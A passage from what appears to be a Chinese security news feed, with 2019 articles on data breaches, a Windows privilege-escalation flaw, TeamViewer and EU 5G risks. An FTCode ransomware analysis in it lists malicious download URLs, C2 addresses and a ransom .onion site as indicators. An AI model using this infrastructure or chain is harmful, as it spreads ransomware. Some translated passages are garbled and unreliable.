第六个根本原因是“非最佳请求检查(non-optimum request check)”,该术语描述了检查客户身份时所犯的错误,通常允许流氓客户假冒另一个实体,例如,恶意软件作者获得了 SSL 证书合法的公司。研究人员发现了 24 个此类事件,占所有 SSL 签发错误事件的 6%。

SSL 证书签发错误的第七个最常见的根本原因是“不正确的安全控制”,这是一个通用类别,其中包括所有 CA 被黑或失去对其基础结构的控制以允许第三方获得 SSL 证书的情况。

详情可以查看该研究报告:

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3425554

9999.jpg

]]>
墨迹科技IPO因数据安全等问题被证监会否决 Wed, 23 Oct 2019 22:13:00 +0800 香港万得通讯社报道,Wind风控日报数据显示,墨迹科技上会被否,证监会发审委在公告中提出询问的主要问题,涉及墨迹天气APP存在未经其许可违规发布互联网新闻信息、通过自主收集及第三方途径获取用户数据是否合规、互联网信息服务收入占营收比过大,以及直接或间接股权关系客户贡献收入占比较大4方面问题,并要求公司明使用用户数据是否合法合规,尤其是商业化变现的合规性等情况。

74578c41d611c08.jpg

有关用户数据安全问题相关详情如下:

2、发行人通过自主收集及第三方途径获取用户数据及标签,并利用数据进行商业化变现,发行人于2019年7月16日收到APP专项治理组发出的《关于APP收集使用个人信息相关问题的通知》,APP专项治理工作组要求发行人就收集使用个人信息中存在的问题进行整改。请发行人代表说明:(1)发行人获取用户数据及标签的过程及方法,是否对用户有明示提示,用户授权在法律上是否完备,是否明确告知收集信息的范围及使用用途,发行人获取用户数据的手段及方式是否合法合规;(2)发行人使用用户数据是否合法合规,尤其是商业化变现的合规性,结合相关媒体报道的墨迹天气上传用户隐私等情况,对照《网络安全法》、《关于办理侵犯公民个人信息刑事案件适用法律若干问题的解释》等法规和司法解释,说明报告期发行人是否存在侵犯用户隐私或数据的的情况,是否存在法律风险或潜在法律风险;(3)数据获取、使用、处理等过程的内部控制制度及执行情况,对数据安全和个人隐私的保护措施与手段,是否出现过个人信息、隐私泄露事件,是否存在纠纷或潜在纠纷;(4)日益加强的数据行业监管及个人隐私保护政策对发行人业务的影响及相关应对措施;(5)发行人针对APP专项治理工作组通知指出问题的整改情况及整改效果,是否获得主管部门的认可,是否面临被处罚的风险。请保荐代表人说明核查依据、过程并发表明确核查意见。


不得不等:这是国内目前为数不多的因为数据安全等问题影响到公司上市进程的。这是在以前很难想象的事,数据安全及网络安全越来越重要,稍有不慎就会对公司的发展带来重大影响。今年的7月24日,Facebook与美国联邦贸易委员会(FTC)就用户隐私问题案,达成为期20年的和解协议。Facebook将按和解协议的要求,支付破纪录的50亿美元罚款,并接受新规管;并针对收集处理用户信息的业务,成立新的监管层和监督流程。个人隐私保护及数据安全在未来将会越来越重要,欧盟的《通用数据保护条例》(GDPR)已经实施,国内的《网络安全法》及《互联网个人信息安全保护指南》也已经发布实施,另外关于个人信息安全保护相关条例也在推进中。对于在工作开展过程中涉及到收集公民个人信息的单位来说,做好网络安全工作,做好数据安全工作,做好个人隐私保护将是一项基本的网络安全义务,必须做且要做好,否则后果太严重。

9999.jpg

]]>
四川绵阳:“黑客”获取公民信息出售 非法牟利近百万元 Wed, 23 Oct 2019 22:13:00 +0800 记者10日从四川省绵阳市北川县公安局获悉,近日,北川县公安局破获一起公安部督办的侵犯公民个人信息案件,3名嫌疑人通过非法入侵贷款、购物、交易等网站,第一时间非法获取公民信息并整理出售,3个月时间内获取并出售20余万条公民个人信息,非法获取利益近百万元。


640.webp.jpg


据介绍,2018年底,北川县公安局网络安全部门经过大量工作摸排梳理,发现绵阳辖区有一条由“黑客”和“中间商”搭档建立的贩卖公民个人信息的庞大的黑色产业链。通过侦查,北川县公安局发现该团伙利用“黑客”扫描、植入等攻击手段入侵各贷款、购物、交易等网站,盗取公民个人信息。在各个网站第一时间非法获取公民的信息后,该团伙又在第一时间进行整理出售,造成了很多人刚好办理了网贷、购车、购房等业务后,立刻就接到各类骚扰电话或是诈骗电话。


该案线索获取后,绵阳市公安局和北川县公安局高度重视,立即成立了市、县联合侦破专案组。公安部将此案挂牌为部督案件,指定北川县公安局办理。经过大量警力深入的研判、调查、摸排,四川绵阳、湖北孝感两处窝点浮现了出来。2019年3月,在证据确凿、信息锁定后,在湖北省孝感市公安的支持下,北川公安专案侦办民警兵分两路,同时在两个城市实施抓捕。在孝感市抓捕了武某,在绵阳市抓捕了杨某和杨某某。抓获时,两处窝点人员正在家里实施网上“黑客”操作。


经突审,杨某等3人是一个犯罪团伙,均为网络“黑客”。据杨某交待,初中毕业后,他没有继续读书,也没有工作,平常喜欢打游戏玩电脑。由于没有工作,没有经济来源供自己玩游戏,就开始钻研“黑客”。2018年底,他开始通过“黑客”入侵、植入等方式,盗取公民个人信息。杨某每日不同时段进入网站数据库对网民申请贷款时、购物时留下的姓名、身份证号码、手机、贷款用途、贷款金额等信息进行抄写,并整理成50或100条一个的TXT文档,然后第一时间将“鲜活”的公民个人信息大量贩卖给下游团伙。


640.webp.jpg

杨某在从事非法侵犯公民信息过程中,在网上认识了湖北省孝感市的武某,与他一样从事“黑客”,二人于是联合起来共同实施犯罪。后来,在他认为工作量很大的时候,又动员同样无业的表弟杨某某前来帮忙。


杨某交待,他们每天出售公民个人信息几千条,收入上万元。3个月时间,团伙非法获利近百万元。


2019年6月,北川县公安局对杨某等3名犯罪嫌疑人以侵犯公民个人信息罪依法提起公诉。近日,法院判处杨某和武某三年六个月和三年两个月的有期徒刑,杨某某被取保候审。

9999.jpg

]]>
为了“薅羊毛”他注册了20万个假账号,被判刑了! Wed, 23 Oct 2019 22:13:00 +0800 一名90后小伙儿针对某一App购买奶粉买一送一的优惠活动,竟注册了20万个账号,利用技术漏洞“薅”走两万多桶奶粉,非法获利六万余元。近日,北京市海淀区人民检察院以被告人黄小天(化名)涉嫌提供侵入、非法控制计算机信息系统程序罪向法院提起公诉。经过法庭审判,被告人黄小天当庭认罪,被判处有期徒刑三年六个月。

为了薅羊毛,注册20万个假账号

出生于1993年的黄小天初中肄业,对计算机技术情有独钟,也十分了解市场上经常做优惠活动的一些商家信息。2017年,黄小天发现一家专做母婴用品的App在针对购买奶粉用户进行优惠活动。厂家为了鼓励注册半年以上老用户首次消费,规定优惠活动为:老用户首次消费购买奶粉,买一桶送一桶。针对这一优惠活动,黄小天在之后一年的时间里,使用脚本程序批量虚假注册了该App的20万个账号。
但在上述账号注册半年以后,当黄小天试图用该批账号参加商家买一桶送一桶的优惠活动时,黄小天发现由于账号注册过程中缺少必要审核信息,这批账号无法登录正常的商家App客户端。

640.webp.jpg

为了成功实现薅羊毛,黄小天转而研究商家的App安装包,并成功对该App客户端进行了攻破,将App的一些验证功能进行修改,终于让自己注册的虚假、非实名账号能够成功登录商家App客户端。
“薅”走奶粉两万多桶,销售账号获利六万余元
随后,黄小天通过互联网销售了两万余个这种虚假注册的账号,这些虚假账号配合他自己开发的冒牌App,最终让活跃在网络中的羊毛党们又一次成功薅到了商家的羊毛,而黄小天也从中获利六万余元。
在审判中,被告人黄小天供称,他一共注册了20万个账号,筛选出两万多个可以参加“奶粉买一赠一活动”的账号出售牟利。而通过这个途径买奶粉的“羊毛党”,薅走的奶粉总共两万多桶。

新闻多看点

NEWS MORE

近年来,因为薅羊毛出现的社会热点事件不在少数,也有一些羊毛党薅羊毛把自己薅进了看守所。

640.webp.jpg

1996年出生的冉某,在2016年3月至2018年1月期间,虚构商户身份,利用多个交易平台,使用自己名下的多张招商银行信用卡以虚假购物和消费的方法,产生虚假交易额累计人民币1600余万元,由此获取招商银行信用卡消费积分300余万分,兑换航空里程、酒店积分、礼宾服务等。经招商银行股份有限公司评估,最低价值人民币12万余元。
冉某的家属向招商银行退赔了全部赃款,冉某因诈骗罪被上海市黄浦区人民法院判处有期徒刑三年,并处罚金人民币四万元。
冉某认为量刑过重提出上诉,上海市第二中级人民法院认为,冉某以非法占有为目的,通过虚构事实、隐瞒真相的方式,骗取财物,数额巨大,决定维持原判。
北京岳成律师事务所高级合伙人岳屾山律师表示:“用自己的真实信息,实施真实的交易行为,然后用这些积分来兑换银行的礼物,不构成犯罪。
“但如果一旦是用了虚假的交易,包括非法获取他人的个人信息来换取这些积分再换取礼物的话,那就属于是欺诈行为了,如果数额足够就有可能构成犯罪。来源:央视新

9999.jpg

]]>
Windows 10更新助手中的安全漏洞为黑客打开大门 Wed, 23 Oct 2019 22:13:00 +0800 据外媒Softpedia报道,微软Windows 10更新助手(Update Assistant) 中的一个安全漏洞使攻击者可以执行具有SYSTEM权限的代码。CVE-2019-1378中记录了这个权限提升漏洞。微软解释说,攻击者最终可以创建具有完全用户权限的帐户,最终获得访问权限以丢弃其他有效负载并控制设备。

640.webp.jpg
微软表示:“ Windows 10 更新助手以处理权限的方式存在一个权限提升漏洞。经过本地身份验证的攻击者可以以更高的系统权限运行任意代码。成功利用此漏洞后,攻击者可以安装程序;查看、更改或删除数据;或创建具有完全用户权限的新帐户。
该漏洞由Jimmy Bayne发现并报告给微软,无论安装了哪个版本的Windows 10,该漏洞都存在于Windows 10 更新助手中。
外媒指出,某些计算机在安装KB4023814更新之后最终会运行Windows 10更新助手。但是,此更新仅适用于运行Windows 10版本1803(2018年4月更新)及更高版本的设备,并且专门用于准备升级到Windows 10版本1903(2019年5月更新)。
另一方面,如果手动安装了更新工具,则在Windows 10版本1903上运行Windows 10更新助手的设备也容易受到攻击。
微软已经发布了新版本的更新助手来解决此漏洞,建议用户尽快安装它。修复此漏洞的唯一方法是手动安装此新版本,至少要将此安装到通过Windows Update自动发送到设备的新更新中。完全删除Windows 10更新助手显然也可以阻止攻击。
微软表示,该漏洞是秘密披露的,被利用的可能性较小,目前还没有关于该漏洞被攻击者利用的报道。

9999.jpg

]]>
个人数据泄露危害远超你的想象 Wed, 23 Oct 2019 22:13:00 +0800 个人隐私数据:就是指个人不愿被外人所知的信息的合集,包括但不限于:出生年月、年龄、电话号码、家庭财务状况、家庭成员情况等等。这些个人隐私数据泄露,如果普通人获得或许并没有太多作用,而被一些商家获得,那就大有用途了。

个人隐私数据一旦泄露,造成危害不可小觑。主要表现在以下几个方面:

一、商家的有针对性广告轰炸

你的隐私带给别有用心的商家,他们可以分析出很多有用的价值,比如:你出生的年代、推断出你所处年龄段的生活经历,你的家庭财务,你的消费倾向。这些数据都可以让商家有针对性对你发起电话轰炸销售。在这个大数据时代,我自己深有体会,哪怕是用了黑白名单,每天也都能接到至少5个以上推销电话。就连80岁的老人的手机都有收到推销电话。相信大家都有这种体会。

二、数据泄露会导致企业丢失或损害客户的数据

互联网,臭名昭着的数据泄露事件屡见不鲜。在过去一年中,据英国调查,其本土近一半的企业至少发生过一次数据泄露事件。组织或公司越大,拥有的数据就越多。因此,尝试危及数据安全的网络犯罪分子可能会成为将此公司的目标。中型企业的可能性增加到66%,大型企业的可能性增加到68%。 损害声誉是明显的。

三、隐私数据外泄会带来严重的诈骗

隐私数据,之所以叫做隐私数据,是因为本该不被人知道,却被人知道了。那如果一个陌生人能够说出你的所有只有你知道的隐私。你会很快建立对他的信任,并相信他说的一切。这就给诈骗分子带来的机会。诈骗分子就是通过各种渠道获得隐私数据,然后和你建立信任关系,最终诈骗成功。如果隐私数据大量外泄,诈骗分子有利可图,必然猖獗。

防御数据泄露该怎么做?

数据泄露现象已经成为一种网络顽疾,需要从个人、企业、法律法规等多方面协同配合,进行防御管理。

从个人角度来说,我们在使用个人计算机等智能设备时,也应增强防护意识,从正规渠道下载软件或应用;安装新软件、新应用时充分了解授权要求,保护个人权益。

从企业角度来说,企业应该加强网络安全保护,从根本上重视数据传输安全,部署SSL证书是就是一个重要的手段,在一定程度上可以大大降低被HTTP网站数据泄露的概率。由于HTTP传输信息没有被加密,传输过程中就给了他人窃取数据的机会,严重影响用户体验,降低了用户对于网站的信任感,对于网站、APP来说也不利于留住用户。

从法律法规层面来说,相关部门应当继续强化电信和互联网用户个人信息保护监管工作,守护互联网健康环境。

如今,数据正成为数字化世界中的强大经济引擎。这时如何确保数据保护和数据安全,尤其涉及到用户敏感的隐私信息,都是摆在企业面前的重要挑战。可以说,一旦企业做好了用户数据的防护,不仅能够有效避免上述的数据泄露的危害,还能够大幅消除用户对于个人隐私泄露的疑虑。而这样不仅可以切实提升用户数据的安全性,而且还能够有效规避在营销层面上带来的各类风险。

9999.jpg

]]>
TeamViewer据称“被入侵”事件的研判及结论 Wed, 23 Oct 2019 22:13:00 +0800 2019年10月11日,火眼举办的FireEyeSummit大会上,几张演讲的PPT拍照被公开到网上,其中一张提及到一款非常流行的远程控制软件TeamViewer曾经疑似被黑客组织入侵,并称其可以访问安装了TeamViewer的任何系统。

 

640.webp.jpg

 

由于TeamViewer的易用性、灵活性及强大的远控功能,其使用面非常大,此事件在国内安全圈中引起了极大关注。奇安信威胁情报中心红雨滴团队对TeamViewer相关的安全事件做了收集分析,FireEye所说的事件应该发生在数年前,新版本TeamViewer仍被受控的可能性较小,原因有以下两点。

 

第一、根据FireEye的报告,其中提到了他们认为的TeamViewer被入侵的时间节点为2016年,而这可追溯到德国的一份报纸,如下图所示:

640.webp.jpg

 

新闻显示TeamViewer黑客于2016年秋季针对的目标,当时该公司的专家发现可疑活动被迅速阻止,以防止造成重大损失。TeamViewer发言人透露,该公司调查了入侵的企图,但没有发现任何暴露客户数据和敏感数据的证据。

 

Der Spiegel指出,TeamViewer并未向公众披露安全漏洞:

“在2016年秋季,TeamViewer成为网络攻击的目标。我们的系统及时发现了可疑活动,以防止造成重大损失。由内部和外部网络安全研究人员组成的专家团队与负责机构紧密合作,成功抵御了该攻击,并使用所有可用的IT法证手段,未发现任何证据表明客户数据或其他敏感信息被盗,即客户计算机系统公司发言人说: “已被感染,或者TeamViewer源代码已被篡改,盗窃或滥用。

 

“出于谨慎考虑,TeamViewer随后对其安全体系结构和IT基础架构进行了全面审核,并通过适当措施进一步加强了它。

 

第二、从FireEye之前的报告来看,见下图,其称尽管他们没有第一手证据证明黑客组织入侵TeamViewer,但他们观察到组织使用了TeamViewer账号密码作为多个目标的切入点,并曾发起过会话进行文件传输。

640.webp.jpg

 

同样,他也在报告中提及了,唯一一次得知Teamviewer被入侵的,仅发生在2016年。

 

而对于窃取TeamViewer凭证的方式有很多种,前些日子我们写的一个名为零零狗的黑产组织,其便是专门进行TeamViewer账号密码窃取的木马,因此对于本次事件的定性,我们不应该认为是入侵了TeamViewer,而是黑客组织获取了目标Teamviewer账号和密码。

 

奇安信威胁情报中心红雨滴团队目前的结论是:在几年前的2016年发生过黑客组织对于TeamViewer软件厂商的攻击并被发现和阻断,但由于厂商未披露太多细节,所以具体的损害情况未知。但是,从红雨滴团队近期对网络安全事件的常态化监控来看,并没有发现近期TeamViewer被攻击植入恶意代码事件,所以不必产生不必要的恐慌,至于TeamViewer这个可能直接穿透防火墙的远控软件的使用是否符合公司和组织的安全策略还请慎重决择。

 

最后,若用户仍不放心,请时刻关注Teamviewer官方公告,开启自动更新。

https://www.teamviewer.cn/cn/

9999.jpg

]]>
欧盟发布5G网络安全风险评估报告:攻击风险增加 Wed, 23 Oct 2019 22:13:00 +0800 2019年10月11日,在欧盟委员会和欧洲网络安全局的支持下,欧盟成员国发布了一份欧盟对5G网络安全风险的评估报告。这一重大举措是执行欧盟委员会于2019年3月通过的安全建议的一部分,该建议旨在确保整个欧盟5G网络的高水平网络安全。该报告基于所有欧盟成员国的国家网络安全风险评估结果。报告确定了主要威胁和威胁行为者,最敏感的资产,主要漏洞(包括技术漏洞和其他类型的漏洞)以及许多战略风险。这一评估为确定可在国家和整个欧盟层面实施的缓解措施提供了基础。

640.webp.jpg

欧盟对5G网络安全风险评估的主要洞察:

报告指出了一些重要的安全挑战,与现有网络的情况相比,这些挑战很可能在5G网络中出现或变得更加突出:这些安全挑战主要与以下方面有关:

5G技术的关键创新(这同时也带来了许多特定的安全性改进),尤其是软件的重要组成部分,以及由5G支持的广泛的服务和应用程序;供应商在建设和运营5G网络中的作用,以及对单个供应商的依赖程度。

具体而言,预计5G网络的推出将产生以下影响:

遭受攻击的风险增加,并且攻击者有更多潜在的切入点:由于5G网络越来越基于软件,与重大安全缺陷相关的风险越来越重要,比如供应商内部糟糕的软件开发流程。这还将使威胁行为者更容易恶意地在产品中插入后门,并使其更难被发现。

由于5G网络架构的新特性和新功能,某些网络设备或功能变得越来越敏感,例如基站和网络的关键技术管理功能。

与移动网络运营商对供应商的依赖相关的风险增加。这也将导致更多的攻击路径可能被威胁行为者利用,并增加此类攻击影响的潜在严重性。在各种潜在威胁行为者中,非欧盟国家或欧盟国家支持的行为者,被认为是最危险的行为者,也是最有可能瞄准5G网络的对象。

在这种由供应商导致的被攻击风险增加的情况下,单个供应商的风险状况将变得尤为重要,包括供应商受到非欧盟国家干预的可能性。

对供应商的重度依赖关系带来的风险增加:对单个供应商的重度依赖关系增加了潜在的供应中断风险,例如由于商业破产及其后果导致的供应中断。它还加剧了弱点或漏洞的潜在影响,同时威胁行为者可能会利用这些弱点,特别是在依赖关系涉及存在高度风险的供应商的情况下。

对网络可用性和完整性的威胁将成为主要的安全问题:除了机密性和隐私威胁外,5G网络预计将成为许多关键IT应用的骨干,这些网络的完整性和可用性将成为国家安全的主要问题,从欧盟的角度来看,这也是一个重大的安全挑战。

所有这些挑战共同创造了一个新的安全范式,因此有必要重新评估适用于该领域及其生态系统的当前政策和安全框架,这对于成员国采取必要的缓解措施至关重要。同时,欧洲网络安全局正在敲定一个与5G网络相关的具体威胁分布图,该分布图将更详细地分析报告中涉及的某些技术方面。

下一步

到2019年12月31日,合作小组将商定一个缓解措施工具箱,用以解决国家和整个欧盟层面已确定的网络安全风险。到2020年10月1日,欧盟成员国应与欧盟委员会合作,评估安全建议的效果,从而确定是否需要采取进一步行动。该评估应考虑到统一的欧洲风险评估的结果和各项措施的有效性。

报告背景

在获得欧洲理事会的支持后,2019年3月26日,欧盟委员会通过了《5G网络安全建议》,呼吁欧盟成员国完成国家风险评估并审查国家安全措施,并在整个欧盟层面共同开展统一风险评估工作,同时就一个通用的缓解措施工具箱进行商议。

在国家层面,每个成员国都完成了5G网络基础设施的国家风险评估,并将评估结果发送给了欧盟委员会和欧洲国家网络安全委员会(ENISA)。国家风险评估特别审查了影响5G网络、敏感5G资产以及相关漏洞的主要威胁和威胁行为者,这些漏洞包括技术漏洞和其他类型的漏洞,例如5G供应链中潜在产生的漏洞。来源:C114中国通信网

9999.jpg

]]>
垃圾邮件传播新型FTCode无文件勒索病毒 Wed, 23 Oct 2019 22:13:00 +0800 目前勒索病毒仍然是全球最大的威胁,最近一年针对企业的勒索病毒攻击越来越多,不断有新型的勒索病毒出现,各企业一定要保持高度的重视,大部分勒索病毒是无法解密的,近期国外安全研究人员发现了一款基于PowerShell脚本的勒索病毒FTCode,此勒索病毒主要通过垃圾邮件进行传播。

近日国外某独立恶意软件安全研究人员曝光了一个新型的FTCode PowerShell勒索病毒,如下所示:

此勒索病毒主要通过垃圾邮件进行传播,发送的垃圾邮件会附加一个压缩包,压缩包里面包含一个恶意的DOC文档,从app.any.run上下载到相应DOC样本,打开DOC文件,如下所示:

启动恶意宏代码,相应的文档内容,如下所示:

恶意宏代码,启动PowerShell进程执行脚本,如下所示:

从恶意服务器下载PowerShell脚本执行,服务器URL地址:

hxxp://home.southerntransitions.net/?need=9f5b9ee&vid=dpec2&81038

打开恶意服务器脚本,如下所示:

从恶意服务器下载VBS脚本,然后设置计划任务自启动项,如下所示:

相应的计划任务自启动项WindowsApplicationService,如下所示:

恶意服务器URL:hxxp://home.southerntransitions.net/?need=6ff4040&vid=dpec2&,脚本内容,如下所示:

解密后的VBS脚本,是一个PowerShell脚本,如下所示:

再次解密PowerShell脚本之后为一个恶意软件下载器,会下载安装其他恶意软件,内容如下所示:

下载完VBS脚本,设置计划任务之后,FTCode PowerShell恶意脚本会解密内置字符串生成一个RSA加密密钥,如下所示:

删除磁盘卷影,操作系统备份等,如下所示:

然后开始加密文件,对指定的文件后缀进行加密,加密后的文件后缀名FTCODE,如下所示:

加密后的文件,如下所示:

在每个加密的文件目录生成勒索提示信息HTM文件READ_ME_NOW.htm,内容如下所示:

需要支付500美元进行解密,勒索病毒解密网站

http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=[guid]

IOC

HASH

A5AF9F4B875BE92A79085BB03**6FE5C

C&C

185.158.248.151

185.120.144.147

home.southerntransitions.net

connect.southerntransitions.com

URL

hxxp://home.southerntransitions.net/?need=9f5b9ee&vid=dpec2&81038

hxxp://home.southerntransitions.net/?need=6ff4040&vid=dpec2&

hxxp://connect.southerntransitions.com/

hxxp://home.hopedaybook.com/?need=9f5b9ee&vid=dpec1&9337

hxxp://home.southerntransitions.net/?need=6ff4040&vid=dpec1&

hxxp://home.isdes.com/?need=6ff4040&vid=dpec2&

最近一两年针对企业攻击的勒索病毒越来越多,不断有新的变种以及勒索病毒新家族出现,真的是越来越多了,各企业一定要高度重视,黑产团伙一直在寻找新的攻击目标……

9999.jpg

]]>
大数据世界中7种灾难性的网络安全错误 Wed, 23 Oct 2019 22:13:00 +0800 在人们生活的这个大数据世界中,需要防范一些网络安全错误。

如今,大数据正在以多种方式改变世界。企业依靠数据来提供高效的服务,但也必须担心网络安全风险。

行业媒体Towards Data Science提供了关于机器学习与黑客相关性的一份非常详细的指南,指出如今黑客正在使用许多大数据工具开展更猛烈的攻击。

随着大数据带来新的网络安全风险,越来越多的企业和组织成为受害者,因此他们需要意识到大数据时代的网络安全问题。

网络安全是大数据时代的一个主要关注点

对于企业而言,没有什么比网络安全更重要了。很多企业存储了大量敏感信息和重要数据,这是黑客和欺诈者想要的东西。在这个企业拥有大量数据的时代,网络攻击者成为了一个有利可图的职业。而企业管理人员保管这些信息负有重大的责任。

然而,很多管理人员都会犯一些简单的错误,这让他们付出了巨大的代价。人们需要了解以下由数据驱动的7个网络安全错误,以避免再犯同样的错误。

1.忘记或没有进行安全培训

并非所有人都了解网络攻击带来的风险。这就是为什么企业员工必须进行安全培训的原因,企业需要确保每个工作人员都知道如何正确存储数据并降低病毒、恶意软件和安全威胁的风险。通常,错误发生在那些不知道自己在做什么的员工身上。培训就是避免发生这种情况的有效方法。

在一个由大数据控制的世界中,培训尤为重要。企业需要采取预防措施,因为使用大数据的黑客能够定期更改其攻击策略。

2.没有备份数据

网络安全很重要,企业需要马上而不是以后处理数据。通过备份并复制所有信息,企业可以在出现问题时做好准备。能够恢复还原系统和数据,并且不会丢失任何内容。虽然并不希望发生任何事情,但如果发生了什么,处理和恢复起来也不会太麻烦。

3.不可信的网站

如果人们在谷歌搜索框中输入“写论文”,就会发现很多搜索结果。但并非所有这些内容网站都来自值得信赖的网站。有些网站提供免费论文,而有一些网络攻击者则试图窃取人们的信息。人们需要在一个好网站获得专家论文。大数据可以帮助企业和人们避开诈骗网站。许多机器学习工具能够诊断网站并识别这些风险。

4.安全性较差的密码

为了更好地记住密码,很多人设定的密码都很简单,但这也意味着其他人也很容易猜测到。如果企业所有员工都使用同样的密码,则更是如此。较好的办法是使用各种字符,其中包括数字和大写字母。这样将很难猜测。外界人士不易猜测或以任何方式将其与企业的业务联系起来。

这是大数据和机器学习可以提供帮助的另一个领域。依赖大数据的安全工具可以评估密码,并查看它们是否足够安全。

5.过时的安全工具

企业是否仍然拥有和运行几年前相同的防病毒软件?这表明其网络安全性很弱。很少或不更新安全工具会使企业的计算机和业务处于不必要的风险之中。不断有新的病毒和恶意软件被创造出来。通常,它们是针对当前的安全措施之后创建的。所以,如果企业不更新安全工具,那么意味着为恶意软件打开了大门。较好的办法是下载可用的更新和补丁。确保没有任何遗漏,并及时了解新的安全工具。这种投资是值得的。

大数据也可以在这方面提供帮助。大数据使网络安全工具更加可靠,并可以帮助企业了解何时需要对其进行更新。

6.薄弱的电子邮件实践

黑客和网络攻击者一直在研究诱使人们打开其威胁文件的新方法。通常这是通过电子邮件完成的。企业的管理人员可能和员工收到很多电子邮件。但是如果没有重视,最终有人可能会打开危险的邮件,因此必须接受安全培训,并提醒不要打开可疑的电子邮件。这样,就不会使企业面临风险。而只是打开一封电子邮件就会损坏系统并窃取企业的敏感数据的事例比比皆是,因此对此一定要重视。

7.认为足够安全

很多人认为不用再采取其他措施来提高网络安全性。他们相信自己的安全工作已经很完善。但事实是,企业永远无法获得足够的安全性,需要及时了解新消息,并采取提高安全性的措施。企业需要寻找新的方法来投资安全。科技和技术一直在进步,而企业需要想跟上其发展的潮流。

大数据时代不可轻视网络安全

大数据使网络攻击的风险比以往更高。企业需要确定优秀的安全工具和大数据预防措施,做好网络安全方面的准备。这意味着要有适当的协议来保护数据和信息。这一切都始于拥有强大的安全性。这意味着拥有正确的工具,并使其与新软件保持同步更新;企业随时关注行业动态,了解是否可以添加新的安全工具;重视收到的电子邮件;通过定期的安全培训,教育员工要小心谨慎,这可能是企业保护或失去业务的区别;使用具有良好评价的可信赖网站,而使用声称提供免费或廉价服务的网站并不值得冒险。

9999.jpg

]]>
黑客如何入侵企业网络?—躲避指南 Wed, 23 Oct 2019 22:13:00 +0800 我们生活在数字经济时代,公司每天都在收集和存储大量有价值的客户数据。事实证明,对于各行各业的公司而言,数据是其竞争力,增长和创收的重要输入。

但是每个有价值的资源都有其脆弱性,在这个不幸的事实中并没有遗漏数据。敏感数据的一个显着漏洞已导致许多IT部门不知所措。

数据泄露是什么意思?

当未经授权的人通过从公司数据库中窃取机密数据或通过内部人员的泄漏获得机密数据的访问权时,该操作称为数据泄露。

数据如何被盗?黑客已经掌握了为小型企业和大型企业渗透数据安全系统以及复制敏感数据而不会被发现或跟踪的技术。

在其他情况下,工作人员恶意或意外地将重要信息泄漏给数据间谍。考虑一下这样一种情况:工作人员将未锁定的计算机或未加密的外部硬盘驱动器留在家中或公共场所,然后恶意人员从设备复制数据。那是意外的数据泄露。该设备也可能被盗。

常见的数据泄露

方法

尽管数据窃贼试图变得复杂,但他们的模式并不太有创意。经验丰富的数据安全专家有时可以通过建立他们进入系统的脆弱区域来对其进行跟踪。企业可以在此处的可用资源中跟踪漏洞。

在大多数情况下,恶意行为者会利用失败的软件更新和鲁ck的最终用户做法来诱骗数据。以下是更多可能的数据泄露方法:

1. 伪造或被盗的凭证

如果企业使用周凭证来建立工作人员的身份,则黑客可以轻松地伪造这些凭证并在不被怀疑的情况下输入企业的数据库。考虑一种情况,用户的用户名是他的电子邮件,他的姓名首字母或生日是他的密码;数据窃贼可以轻松猜出这种登录凭据。而且,黑客可以从其PC上窃取用户凭据。

2.BYOD

自带设备(BYOD)有其好处,例如提高员工效率,但现在正逐渐成为严重的工作场所数据威胁。这些员工设备大多数都没有加密,有些甚至安装了装有恶意软件的应用程序。

此类设备中的任何重要文件和电子邮件都可以很容易地被黑客检索到。对于招聘机构而言,这尤其危险,尤其是当他们将工作外包给海外员工时。

3.卡欺诈

在某些情况下,数据窃贼可以访问ATM机和加油站,并附有间谍软件,这些软件会从在卡中刷卡的每个人复制信用卡数据。

而且由于许多人会回收密码和密码,因此该恶意软件会使用被盗的信用卡信息来猜测用户名和密码,然后再使用它们来访问公司和私人员工的电子邮件。

如何防止数据泄露

1.投资强大的网络安全

最近发生的数据泄露案例表明,企业不再能够依靠防火墙,防病毒软件和入侵检测软件来保护其数据免受可能的数据泄露。重要的是安装多层网络安全系统,该系统不仅可以阻止可能的渗透尝试,而且可以在黑客入侵之前识别出可能的漏洞。

2. 远程数据备份

如果企业有远程员工,则必须投资购买功能强大的远程数据备份系统。现在是时候摆脱备份磁带了,因为备份磁带在到达总公司之前很容易丢失,被盗或处理不当。良好的备份系统应使企业能够通过Internet自动,安全且实时地备份数据。

3.部署SSL证书

在黑客的眼中,明文传输也就是HTTP是一大块肥肉。它的基数很大,漏洞百出,在流量劫持者眼中,是很好的下手目标。利用明文传输自身的缺陷,网络黑客们不费吹灰之力,就可以对信息内容进行窃听、篡改和劫持。

相比于通信方身份和数据完整性无法验证的HTTP协议,HTTPS是一个基于HTTP的安全通信通道,它运用安全套接字层(SSL)进行信息交换,具有身份验证、信息加密和完整性校验的功能,可以保证传输数据的机密性和完整性,乃至服务器身份的真实性,进而有效避免HTTP被劫持的问题。

4. 内部人行为监控

行为监控系统将在防止数据被恶意内部人员窃取敏感信息给未授权人员方面大有帮助。他们将知道合规官,首席执行官或人事经理一直在他们的雷达范围内,因此他们将停止其恶意行为。

5.防止数据丢失(DLP)

数据丢失防护(DLP)系统使企业可以设置给定信息可以离开网络的条件。当恶意员工尝试在不遵循设置规则的情况下复制该信息时,其访问将被自动阻止。

6.最终用户的安全意识

培训员工更加安全,以很大程度地减少意外数据泄露的风险。确保他们了解数据的价值以及数据窃贼用来从毫无戒心的员工那里窃取信息的技巧。

结论

我们在这里讨论的数据保护方法将帮助企业阻止恶意数据窃贼。请记住,所有行业的所有公司都容易受到我们讨论的数据泄露威胁的影响。网络道路千万条,安全为第一条。

9999.jpg

]]>
新西兰卫生组织被黑 百万用户信息泄露 Wed, 23 Oct 2019 22:13:00 +0800 新西兰的初级卫生组织Tū Ora Compass Health官网在今年8月遭到骇客乱涂鸭,追查之下才知道骇客早在2016年就曾入侵该站,可能有100万用户的信息外泄。

初级卫生组织(Primary Health Organisation,PHO)是新西兰政府出资成立的非营利组织,宗旨在于改善人民的健康状况,通过医疗中心所提供的病患数据进行分析,再回馈给医疗中心。全新西兰设有30个PHO,Tū Ora仅是其中之一,它存放了Wellington、Wairarapa与Manawatu等三大新西兰地区的民众数据,虽然这些地区的总人口数只有64.8万,但如果包括已故或离开相关区域的人口,数据库中存有从2002年至今的约100万的用户数据。

  尽管证实了骇客曾在2016年至今年3月间入侵该站,但Tū Ora并不确定骇客的意图,也不知其是否访问了病患的数据库。而这些数据库主要存放了病患的姓名、生日、地址、种族与健康指数等,也有少数的医疗信息,但并没有任何的财务信息、护照号码或驾照号码等。

